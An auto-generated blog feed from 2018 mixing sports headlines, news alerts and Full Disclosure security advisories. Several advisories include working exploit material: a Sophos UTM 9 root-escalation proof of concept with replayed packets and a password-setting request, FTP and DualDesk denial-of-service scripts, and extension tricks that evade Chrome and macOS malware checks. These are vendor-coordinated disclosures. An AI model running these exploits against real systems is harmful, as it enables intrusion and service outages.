Saturday, March 3, 2018

Anonymous Art Show

Anonymous Art Show. img_5673 · 96d1db1d-f494-434b-bfa7-95e34dd16891 · female hands with pen writing on notebook · Title - "On A Moonlit Night" (The year of winter white) Artisan · tiger_painting_andrea_mueller_art_whistler-e1520023252952 · feature-e1520024107638 · img_4813 · img_4910.

from Google Alert - anonymous http://ift.tt/2FcZ5G3
via IFTTT

Orioles: 1B Chris Davis (elbow/forearm) sidelined 3-5 days; MRI revealed no structural damage (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens should feel the heat from 3-year playoff drought, says GM Ozzie Newsome (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Friday, March 2, 2018

Ravens: Robbery charge against CB Marlon Humphrey dismissed (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service

KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service

Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service
Advisory ID: KL-001-2018-007
Publication Date: 2018.03.02
Publication URL: http://ift.tt/2HYyuOt

1. Vulnerability Details

    Affected Vendor: Sophos
    Affected Product: UTM 9
    Affected Version: 9.410
    Platform: Embedded Linux
    CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)
    Impact: Privilege Escalation
    Attack vector: SSH

2. Vulnerability Description

    The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, the running service is accessible over a network port on the loopback interface. By replaying the network traffic required to obtain a SID from this service it is possible to escalate privileges to root.

3. Technical Description

    1. Obtain a privileged session token

        $ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7
        loginuser@1.3.3.7's password:
        $ python kl-loginuser-confd-priv_esc.py
        pojiZSqWEUAUDNIQtSop

    2. Using that session token, set the root password

        POST /webadmin.plx HTTP/1.1
        Host: 1.3.3.7:4444
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
        Accept: text/javascript, text/html, application/xml, text/xml, */*
        Accept-Language: en-US,en;q=0.5
        X-Requested-With: XMLHttpRequest
        X-Prototype-Version: 1.5.1.1
        Content-Type: application/json; charset=UTF-8
        Referer: https://1.3.3.7:4444/
        Content-Length: 422
        Cookie: SID=pojiZSqWEUAUDNIQtSop
        DNT: 1
        Connection: close

        {"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

        HTTP/1.1 200 OK
        Date: Thu, 23 Mar 2017 15:33:53 GMT
        Server: Apache
        Expires: Thursday, 01-Jan-1970 00:00:01 GMT
        Pragma: no-cache
        X-Frame-Options: SAMEORIGIN
        X-Content-Type-Option: nosniff
        X-XSS-Protection: 1; mode=block
        Vary: Accept-Encoding
        Connection: close
        Content-Type: application/json; charset=utf-8
        Content-Length: 178895

        {"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]

    3. Look for success message.

        "objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

    4. Profit.

        loginuser@[redacted]:/home/login > su
        Password:
        [redacted]:/home/login # id
        uid=0(root) gid=0(root) groups=0(root),890(xorp)

4. Mitigation and Remediation Recommendation

    The vendor has addressed this vulnerability in version 9.508. Release notes and download instructions can be found at:

    http://ift.tt/2oJHuyk

5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

    2017.07.21 - KoreLogic submits vulnerability details to Sophos.
    2017.07.21 - Sophos acknowledges receipt.
    2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos.
    2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos.
    2017.09.18 - Sophos informs KoreLogic that this issue will require additional engineering and requests an extension of the disclosure timeline.
    2017.09.25 - 45 business days have elapsed since the vulnerability was reported to Sophos.
    2017.11.07 - 75 business days have elapsed since the vulnerability was reported to Sophos.
    2017.12.14 - 100 business days have elapsed since the vulnerability was reported to Sophos.
    2018.01.12 - KoreLogic requests an update from Sophos.
    2018.01.15 - Sophos informs KoreLogic that the expected release date for the UTM 9.5 MR 6 version containing the mitigation is the middle of February.
    2018.01.16 - 120 business days have elapsed since the vulnerability was reported to Sophos.
    2018.02.28 - 150 business days have elapsed since the vulnerability was reported to Sophos.
    2018.03.01 - UTM 9.508 released by Sophos.
    2018.03.02 - KoreLogic public disclosure.

7. Proof of Concept

    from socket import socket,AF_INET,SOCK_STREAM

    class Exploit:
        def __init__(self):
            self.host = '127.0.0.1'
            self.port = 4472
            self.connected = False
            self.s = None
            return None

        def disconnect(self):
            self.s.close()
            return True

        def send_trigger(self):
            packet_one = '00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex')
            self.s.send(packet_one)
            self.s.recv(4096)
            packet_two = '00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex')
            self.s.send(packet_two)
            self.s.recv(4096)
            packet_three = '0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex')
            self.s.send(packet_three)
            print self.s.recv(4096).strip()
            return True

        def connect(self):
            self.s = socket(AF_INET, SOCK_STREAM)
            self.s.connect((self.host,self.port))
            self.connected = True
            return True

        def run(self):
            self.connect()
            self.send_trigger()
            self.disconnect()
            return True

    if __name__=="__main__":
        Exploit().run()

The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community.
http://ift.tt/292hO8r

Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2017-12544 XSS on HPE System Management Homepage v7.6.0.11 and minor

[FD] Content Injection in Samsung Display Solutions Application for Android [CVE-2018-6019]

[Original post here: http://ift.tt/2H0vorV]

TITLE

Content Injection in Samsung Display Solutions Application for Android [CVE-2018-6019]

SUMMARY

Samsung Display Solutions App for Android did not use encryption (SSL) for information transmission, thus allowing an MITM attacker to inject their own content into the app. The vendor fixed this issue and users should install the latest version (3.02 or above). MITRE has assigned CVE-2018-6019 to track this issue.

DETAILS

Samsung makes an Android application that allows users to browse B2B content related to Samsung’s display products. While performing network level testing, we discovered that the content shown in the app was loaded via server calls made by the application without any kind of encryption (SSL). This allowed an MITM attacker to inject their own content into the app.

To observe the issue on v3.01:

1. Install the application on the device.
2. Set up an MITM proxy but do not install the SSL certificate on the device (we used PacketCapture).
3. Start the proxy. At this point all network traffic will be going through the proxy with the SSL traffic being encrypted by a self-signed certificate which is not trusted by the device.
4. Open the app.
5. Go back to the proxy and observe captured traffic.

All testing was done on Android 7 and application version 3.01. Network captures were performed using an on-device proxy (PacketCapture) without a trusted SSL certificate.

VENDOR RESPONSE

The vendor fixed this issue and users should install the latest version (3.02 or above).

REFERENCES

CVE ID: CVE-2018-6019
Google Play Link: http://ift.tt/2Flb5IV

BOUNTY INFORMATION

This issue was originally reported to the Samsung Mobile Security Bounty Program but was deemed to be out of scope. However, after being transferred to the Display Solutions team, this issue qualified for the Samsung TV Bounty Program.

CREDITS

Advisory written by Yakov Shafranovich.

TIMELINE

2017-09-09: Reported to Samsung Mobile Security bounty program
2017-09-09: Automated response from the vendor received
2017-10-18: Engineer assigned to the issue
2017-11-19: Deemed out of scope; reply sent
2017-11-25: Vendor requests additional information; reply sent
2017-11-27: Issue rejected, public disclosure requested
2017-12-06: Reply from vendor received, additional information requested; reply sent
2017-12-07: Additional information requested by the vendor
2017-12-09: Reply sent with screenshots
2018-01-08: Vendor accepts the issue as in scope, and plans remediation
2018-01-11: Issue transferred to the Samsung TV bounty program
2018-01-14: Fixed version released
2018-01-22: CVE requested and received from MITRE
2018-02-14: Vendor requests confirmation of the fix, fix confirmed and reply sent
2018-03-25: Draft advisory sent to vendor for review; bounty payment received
2018-03-01: Public disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] CSRF vulnerabilities in D-Link DGS-3000-10TC

Hello list! There are Cross-Site Request Forgery vulnerabilities in D-Link DGS-3000-10TC. In a previous advisory I wrote about Cross-Site Scripting and Content Spoofing vulnerabilities.

Source: Gmail -> IFTTT-> Blogger

[FD] Another TCP based IDS bypass technique. CVE-2018-6794

-------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2018-7449 SEGGER embOS/IP FTP Server v3.22 / FTP CMDs Denial Of Service

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://ift.tt/2FLOFhE
[+] ISR: Apparition Security

Vendor:
=============
www.segger.com

Product:
===========
embOS/IP FTP Server v3.22

Vulnerability Type:
===================
FTP Commands Denial Of Service

CVE Reference:
==============
CVE-2018-7449

Security Issue:
================
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command.

    STOR 666\r\n
    LIST\r\n
    RETR '+'..\\'*8+'Windows\system.ini\r\n

    TELNET x.x.x.x 21
    220 Welcome to embOS/IP FTP server
    USER anonymous
    331 Password required.
    PASS anonymous
    230 User logged in, proceed.
    STOR Bye!

    CRASH!!!

Exploit/POC:
=============

    import socket,time

    VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ')
    USR='anonymous'
    PWD='anonymous'
    CMD="STOR Bye!\r\n"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((VICTIM, 21))
    print s.recv(1024)  # Receive FTP Banner
    time.sleep(1)
    s.send("USER " + USR+ "\r\n")
    print s.recv(1024)
    time.sleep(1)
    s.send("PASS "+ PWD+"\r\n")
    # print s.recv(1024)
    time.sleep(1)
    s.send(CMD)
    print 'Sent %s' % CMD
    s.close()

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
=============================
Vendor Notification: February 17, 2018
Vendor acknowledgement: February 19, 2018
Vendor released fixed version v3.22a : February 23, 2018
March 1, 2018 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

[FD] DualDesk v20 "Proxy.exe" Server / Denial Of Service - CVE-2018-7583

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://ift.tt/2GUqooI
[+] ISR: Apparition Security

Vendor:
===============
www.dualdesk.com

Product:
===========
DualDesk v20

DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no configuration.

Vulnerability Type:
===================
Denial Of Service

CVE Reference:
==============
CVE-2018-7583

Security Issue:
================
Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application which listens on TCP Port 5500 by sending a long string of junk chars.

    (d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available)
    eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
    eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    ntdll!NtWaitForMultipleObjects+0x15:
    77c6016d 83c404 add esp,4

Exploit/POC:
=============
Start the Dualdesk Run Proxy as Application.

    C:\>python -c "print 'a'*8000" > crash.txt
    C:\>type crash.txt | nc.exe localhost 5500

Crash!!!

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
=============================
Vendor Notification: February 4, 2018
Second attempt : February 17, 2018
Request CVE, assigned by Mitre : March 1, 2018
March 1, 2018 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

Ravens: Ozzie Newsome says biggest project in his final season as GM is to get Joe Flacco better targets (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/01/2018

Plant Gravity Perception (PGP): Today the crew removed the Plant Gravity Perception seed cassettes from Experiment Containers (ECs) on the two European Modular Cultivation System (EMCS) rotors and stowed them in a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI). They also replaced the ECs on the rotors with ECs for the next Plant … Continue reading "ISS Daily Summary Report – 3/01/2018"

from ISS On-Orbit Status Report http://ift.tt/2Ff0cZ4
via IFTTT

Biggest-Ever DDoS Attack (1.35 Tbs) Hits Github Website

On Wednesday, February 28, 2018, GitHub's code hosting website was hit with the largest-ever distributed denial of service (DDoS) attack, which peaked at a record 1.35 Tbps. Interestingly, attackers did not use any botnet network, and instead weaponized misconfigured Memcached servers to amplify the DDoS attack. Earlier this week we published a report detailing how attackers could abuse Memcached,


from The Hacker News http://ift.tt/2F5ZzNY
via IFTTT

Thursday, March 1, 2018

Missing profile images for anonymous visitors when Social Private Files is turned on

With Social Private Files turned on the profile images are saved in the private files folder. This works ok, but for some display modes the profile image is not replaced by the default image. When it is not replaced with the default image a request is done for the normal image. But this one is not accessible ...

from Google Alert - anonymous http://ift.tt/2F3ix7P
via IFTTT

ALCOHOLICS ANONYMOUS 208-235-1444 AL-ANON 208-232-2692

ALCOHOLICS ANONYMOUS 208-235-1444 AL-ANON 208-232-2692.

from Google Alert - anonymous http://ift.tt/2oIj1t4
via IFTTT

anonymous galaxy



from Google Alert - anonymous http://ift.tt/2F6bMCx
via IFTTT

JotForm Review: Poor poor service by Anonymous Reviewer

What are the best aspects of this product? Easy to use, great features, let down by extremely poor customer service. Will never use again, paid for a service that was cut off without warning for no reason whatsoever. Rude staff. What aspects are problematic or could work better? Locked out of my paid ...

from Google Alert - anonymous http://ift.tt/2FexaZe
via IFTTT

The Lunar X


The striking X in this lunarscape is easily visible in binoculars or a small telescope, but not too many have seen it. The catch is, this lunar X is fleeting and only apparent in the hours before the Moon's first quarter phase. Along the shadow line between lunar day and night, the X illusion is produced by a configuration of craters seen here toward the left, Blanchinus, La Caille and Purbach. Near the Moon's first quarter phase, an astronaut standing close to the craters' position would see the slowly rising Sun very near the horizon. Temporarily, crater walls would be in sunlight while crater floors would still be in darkness. Seen from planet Earth, contrasting sections of bright walls against the dark floors by chance look remarkably like an X. This sharp image of the Lunar X was captured on February 22nd. For extra credit, sweep your gaze along the lunar terminator and you can also spot the Lunar V. via NASA http://ift.tt/2HSh71Q

Wednesday, February 28, 2018

Anonymous - Executive Chef

Anonymous – Executive Chef. Posted on February 28, 2018. One of Cambridge's most well-known restaurants is seeking an Executive Chef to lead its dynamic kitchen team. Proper candidates will possess the ability to lead others in their culinary development while fostering a clean, responsible and ...

from Google Alert - anonymous http://ift.tt/2oxAkOv
via IFTTT

Greatest Castlevania ever

Anonymous 02/28/18(Wed)15:13:16 No.408324851 Archived. Greatest Castlevania ever. >> Anonymous 02/28/18(Wed)15:14:44 No.408324983. Anonymous 02/28/18(Wed)15:14:44 No.408324983. >Greatest Castlevania ever >SOTN assets. >> Anonymous 02/28/18(Wed)15:15:41 No.408325043.

from Google Alert - anonymous http://ift.tt/2GQLft5
via IFTTT

Anonymous female agency veteran on what needs to change

An anonymous woman who has worked at multiple agencies talks about how problems in workplace culture stem from white privilege and an acceptance of sexist language and harassment as harmless banter. She also explains that leadership is complicit, saying, "When there are companies who are ...

from Google Alert - anonymous http://ift.tt/2EZaehm
via IFTTT

Anonymous-Feedback-LTI 0.1.1

An LTI app that allows course members to submit anonymous comments.

from Google Alert - anonymous http://ift.tt/2ow8t12
via IFTTT

Why Ravens will be active, but not break the bank in free agency - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

anonymous galaxy



from Google Alert - anonymous http://ift.tt/2oDunOZ
via IFTTT

Apple Moves iCloud Data and Encryption Keys for Chinese Users to China

Apple has finally agreed to open a new Chinese data center next month to comply with the country's latest controversial data protection law. Apple will now move the cryptographic keys of its Chinese iCloud users to data centers run by a state-owned company called Cloud Big Data Industrial Development Co, despite concerns from human rights activists. In 2017, China passed a Cybersecurity Law


from The Hacker News http://ift.tt/2CsN0Pl
via IFTTT

A Simple Bug Revealed Admins of Facebook Pages — Find Out How

Facebook Page admins are publicly displayed only if admins have chosen to feature their profiles. However, there are some situations where you might want to contact a Facebook page admin or want to find out who is the owner of a Facebook page. Egyptian security researcher Mohamed A. Baset has discovered a severe information disclosure vulnerability in Facebook that could have


from The Hacker News http://ift.tt/2HRhxWj
via IFTTT

Orioles: Why RP Mychal Givens makes list of MLB's most under-the-radar players - David Schoenfield (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Format Manuscript/Mixed Material

Results: 1-2 of 2 | Refined by: Original Format: Manuscript/Mixed Material Remove Look Inside: Anonymous to Thomas Jefferson, April 20, 1808 (mtj1.041_0396_0397/) Remove ...

from Google Alert - anonymous http://ift.tt/2EXDYew
via IFTTT

Webform 4.16 file upload gives Invalid POST data for anonymous users

We have a webform where anonymous users register themselves for an internship and to do so they upload their documents in the webform. Ours is a prestigious institute and much competition is there to join the short term internship. So sometime per day more than 120 submissions happens for few ...

from Google Alert - anonymous http://ift.tt/2CO75uM
via IFTTT

[FD] SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management

SEC Consult Vulnerability Lab Security Advisory < 20180228-0 >
=======================================================================
              title: Insecure Direct Object Reference
            product: TestLink Open Source Test Management
 vulnerable version: <1.9.17
      fixed version: 1.9.17 (after November 2017), and the current "testlink_1_9" branch
         CVE number: -
             impact: Medium
           homepage: http://testlink.org/
              found: 2017-09-22
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal
                     Moscow - Munich - Kuala Lumpur - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:

Source: Gmail -> IFTTT-> Blogger

Classes At Saginaw's Thompson Middle School Cancelled Due To Anonymous Threat

Classes have been cancelled for Wednesday at Saginaw's Thompson Middle School. Superintendent Nathaniel McClain says that followed an anonymous call to a school administrator around 4:30 Tuesday afternoon threatening to “shoot up the building”. McClain says staff members are working with ...

from Google Alert - anonymous http://ift.tt/2BUdKXQ
via IFTTT

anonymous galaxy



from Google Alert - anonymous http://ift.tt/2oCMIfg
via IFTTT

Wilbon cites anonymous players & teams who think the Rockets are

ESPN's Michael Wilbon took to “Pardon the Interruption” on Tuesday to offer up an intriguing — and anonymously-sourced — report on how the NBA views the top of the league's hierarchy.

from Google Alert - anonymous http://ift.tt/2sZk9Ox
via IFTTT

Memcached Servers Abused for Massive Amplification DDoS Attacks

Cybercriminals have figured out a way to abuse widely-used Memcached servers to launch DDoS attacks over 51,000 times more powerful than their original strength, which could result in the knocking down of major websites and Internet infrastructure. In recent days, security researchers at Cloudflare, Arbor Networks, and Chinese security firm Qihoo 360 noticed that hackers are now abusing "Memcached" to


from The Hacker News http://ift.tt/2CqaULg
via IFTTT

Tuesday, February 27, 2018

How to spam someones email anonymously

Normally, when you send an email to someone, the email header contains The first question to answer here is why go for anonymous email when there are plenty of premium featured and free email services such as Gmail, Outlook and Yahoo! Mail available? Well, privacy and anonymity is a digital right ...

from Google Alert - anonymous http://ift.tt/2ovfCPg
via IFTTT

Trip advisor is NOT anonymous! - TripAdvisor Support Forum

Answer 21 of 23: I did a review on a hotel and the Manager has responded, and addressed me by my full name. How do I contact Trip Advisor about this? I am a Senior Contributor but won't be posting anymore unless this is resolved!

from Google Alert - anonymous http://ift.tt/2CLpYPe
via IFTTT

2018 NFL combine preview: Ravens should focus on every offensive position - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Google anonymous proxy

It hides your real IP address, encrypts your traffic communication to the web, hide your internet history and protecting Apr 27, 2016 HidesterVPN - Free Web Proxy ✓ 100% Free ✓ Anonymous with SSL / HTTPS ✓ No Ads ✓ Enable / Disable cookies ✓ Enable / Disable objects ✓ Choice of two servers ...

from Google Alert - anonymous http://ift.tt/2BWcxyX
via IFTTT

[FD] AxxonSoft Axxon Next - AxxonSoft Client Directory Traversal via an initial /css//..%2f substring in a URI. CVE-2018-7467

[FD] Download Protection Bypass in Google’s Chrome (multiple)

[Blog post here: http://ift.tt/2F5iEDp]

SUMMARY

We have found several instances of files bypassing the download protection offered by Google’s Chrome browser. All of these have been reported to the vendor, and whichever were accepted by the vendor were fixed in Chrome M51 and M52.

BACKGROUND

The Chrome and Chromium browsers are open-source based web browsers offered by Google. Among their features is a safety feature that detects unsafe downloads to protect the user. This feature works in multiple ways but is controlled via a file in Chrome’s source code (“download_file_types.asciipb”) which defines several options based on the file extension of the downloaded file:

- Platform/OS
- What kind of warning to show the user
- Whether this file type is an archive
- Whether the file can be opened automatically by clicking on it in the download area
- Whether a ping gets sent back to Google for every download of this type (FULL), some downloads (SAMPLED) or not sent at all. This checksum check is used to check against a server-side blacklist of known bad files.

The Chrome Rewards bug bounty program includes a separate section covering download bypass that was added in March of 2016. To be eligible, it needs to be on a supported platform (MacOS or Windows), be dangerous by being clicked and not send a full ping back to Google. In December of 2016, the scope of this was changed to only include file extensions already in the source code for Chrome.

As part of our testing in scope of this program, we tested all file extensions that are included in a default on MacOS v10.11 (El Capitan) and Windows 2012 R2 / 7 Enterprise. This advisory lists all of the bypasses that we located, reported to the vendor, and the status of whether they were accepted and fixed, or rejected. Most of these were reported prior to the scope change in December 2016, and included patches whenever feasible.

DETAILS

The following extensions were reported but were rejected as being out of scope and were not fixed:

- ChromeOS: APK
- Linux: AFM, PFA, TIF
- MacOS: APP, CONFIGPROFILE, DFONT, ICC, INTERNETCONNECT, MOBILECONFIG, NETWORKCONNECT, OTF, PREFPANE, PROVISIONPROFILE, QTZ, SAFARIEXTZ, SAVER, TTF, WEBBOOKMARK, WEBLOC
- Windows: CAMP, CDMP, DESKTHEMEPACK, DIAGCAB, DIAGPKG, GMMP, ICC, IMESX, MOV, MSU, OTF, PFB, PFM, PRF, RAT, QDS, QT, RDP, SEARCH-MS, THEMEPACK, THEMES, TTC, TTF, WCX

The following extensions were reported, confirmed to be dangerous and fixed, all on MacOS (the underlying issue has been described in a separate post).

- AS, CDR, CPGZ, DART, DC42, DISKCOPY42, DMGPART, DVDR, IMG, IMGPART, ISO, MPKG, NDIF, PAX, SMI, SPARSEBUNDLE, SPARSEIMAGE, TOAST, UDIF, XIP

These issues were fixed in Chrome M51 and M52.

REFERENCES

- Chrome Bug Reports (rejected): 671382, 671385, 624224, 596342, 605386, 601255, 601250, 600910, 600615, 600609, 600606, 600601, 600597, 600592, 600590, 600587, 600581, 599880
- Chrome Bug Reports (fixed): 596354, 600613, 600907, 600908

BOUNTY INFORMATION

The issues that were fixed qualified for the Chrome Rewards security bounty program and a bounty has been paid.

CREDITS

Advisory written by Yakov Shafranovich.

TIMELINE SUMMARY

2016-03-20: First report submitted
2016-03 to 2016-12: multiple other reports submitted, and fixes applied
2016-12-06: Last report submitted
2018-02-26: Public disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] Auto-detection of Compressed Files in Apple’s macOS

[On the web here: http://ift.tt/2GOjaCF]

[NOTE: This was originally discovered as a result of a different set of bugs in Google’s Chrome browser, details of which will be posted soon. While the impact of this particular issue isn’t high, it was interesting enough for us to pursue a coordinated disclosure process. Because of the large number of parties involved, the disclosure coordination process took a long time which is why this article took almost two years to publish.]

SUMMARY

Compressed files on macOS are autodetected by the operating system even if they are renamed to certain other extensions. This can be used to fool users and antivirus software that relies on file extensions by packaging malicious code inside compressed files with different extensions. The vendor (Apple) does not consider this to be a security issue. Most anti-virus vendors for macOS are not affected by this issue. This was originally discovered in macOS v10.11 (El Capitan) and v10.12 (Sierra), but the latest version of macOS v10.13 (High Sierra) was not tested.

BACKGROUND

On Microsoft Windows, files are identified by their extensions, which appear after the “.” in the filename. On macOS, metadata about the file may be available separately and either a creator code, a type code or a Uniform Type Identifier is used. However, on the Internet (in browsers and email clients) instead of filenames, MIME media types are used with a registry maintained by IANA on behalf of the IETF. Linux systems use a mix of extensions and media types, with some auto-detection / “sniffing” of media types based on file content. Some mappings do exist across the various systems as well.

For example, a ZIP archive would be identified as follows:

- Windows – .zip extension
- Internet/Linux – application/zip media type
- macOS UTI – com.pkware.zip-archive

Additionally, on most desktop OSes, an association exists between a file type and an application that will open it by default. Those associations are maintained differently from OS to OS, but at their core they associate a particular identifier about a file type such as an extension (Windows) or a media type (browsers), and a program assigned to open it by default. Users are used to this arrangement and many security utilities such as antivirus programs will only look inside files that may be dangerous. For example, a ZIP file on Windows if renamed to a different extension may not necessarily be scanned by default because double clicking on it will not open it.

Another important point is that malware authors may sometimes try to disguise malicious code by compressing it inside an archive such as a ZIP file. The expectation is that when a user downloads it, they will double click and open it using the default program on that platform, and then will execute the malicious code. This is another reason why this functionality deserves a closer look.

DETAILS

The following two things were discovered:

1. The compression utility that is part of macOS will open any file extension associated with that program and will try to “sniff” / auto-detect the original file type used. The following file extensions were tested:

   ZIP files when renamed as:
   - .AS
   - .CPGZ
   - .PAX
   - .XIP (a Gatekeeper warning will be shown for non-signed files)

   DMG files when renamed as:
   - .CDR
   - .DART
   - .DC42
   - .DISKCOPY42
   - .DMG
   - .DMGPART
   - .DVDR
   - .IMG
   - .IMGPART
   - .ISO
   - .NDIF
   - .SMI
   - .SPARSEBUNDLE
   - .SPARSEIMAGE
   - .TOAST
   - .UDIF

2. The OS itself (macOS) will open and execute some file formats even when renamed to a different extension. Gatekeeper protection is not bypassed. The following extensions are affected:
   - PKG
   - MPKG

To duplicate the first issue, create a ZIP file containing any content (we used the EICAR test file) and rename it to include a file extension from any of the compression formats above for ZIP (AS, CPGZ, PAX or XIP). Send this file to a macOS computer via USB or email or a link; download and double click. The ZIP file will open correctly. You can also do the same thing but with a DMG file for any of the DMG file formats listed above (DC42, ISO, etc).

To duplicate the second issue, create a PKG file containing some code or take an existing one, rename as .MPKG and transfer to a macOS computer. Double click to execute.

All testing was done in May 2016 on a MacBook Pro running MacOS v10.11.3 (El Capitan), and re-tested again in April 2017 on a MacBook running MacOS v10.12.04 (Sierra). It is unclear whether later versions of MacOS are affected since we did not perform testing on versions past v10.12.04 (Sierra).

RECOMMENDATIONS

There are two issues:

1. Human users and anti-malware software are not aware that macOS supports a large number of legacy compression file types and may not be properly looking out for them or scanning them. Because of the “sniffing” behavior, it would be trivial for an attacker to package malware inside a well known format like ZIP or DMG and rename it to one of these extensions.
2. Anti-virus software may fail to scan such archives because they do not expect a ZIP file to be packaged that way.

The information in this article was originally discovered while analyzing a non-Apple application running on macOS (a separate advisory will be published in the future).

Our recommendations are as follows:

- Apple should consider deprecating or adding a warning for these extensions and removing the “sniffing” support.
- Anti-malware software for macOS should support all of these formats, as well as accounting for the possibility of one format being renamed as another

VENDOR RESPONSES

The vendor (Apple) does not consider this to be a security issue as follows:

>> After examining your report we do not see any actual security implications.
>> All of the extensions provided in your report are supported disk image formats and will be treated equally.

>> After examining your report we do not see any actual security implications. Archive Utility opens archive files and the extensions you provided are archive extensions.

>> After examining your report we do not see any actual security implications. The Installer app makes it clear when executable code is running even if the file has been renamed.

As per advice of Apple’s security team, we also contacted multiple antivirus vendors that provide AV software for macOS to check if they are affected by this issue. Here is what we got back:

Vendors That Responded:

- Avast – not affected
- Avira – not affected
- AVG – related bug for engine versions prior to 4668 has been fixed earlier (see CVE-2017-9977 and our blog post); other products not affected
- BitDefender – not affected
- Cisco – one product impacted, tracked by bug identifier CSCve34034 – no CVE has been issued:
  Cisco AMP Virtual Private Cloud Appliance – The Cisco AMP appliance does not rely on the file extension when processing ZIP archives or PKG install packages. However, older versions relied on file extension to detect DMG files and so is susceptible to one of the scan evasion problems described in the advisory. The DMG portion is now fixed in software release 1.4.5.
- ClamXAV (Canimaan Software) – not affected
- Comodo – not affected
- CyberByte – not affected
- Dr. Web – not affected
- ESet – not affected
- F-Secure – not affected
- Intego – not affected
- Kaspersky – not affected
- Malware Bytes – not affected
- Protect Works – not affected
- QuickHeal – not affected
- Sophos – not affected
- Symantec – not affected
- Trend Micro – not affected
- Webroot – not affected

Other Vendors:

- 360 Total Security – pending
- BullGuard – no response
- EScanAV – no response
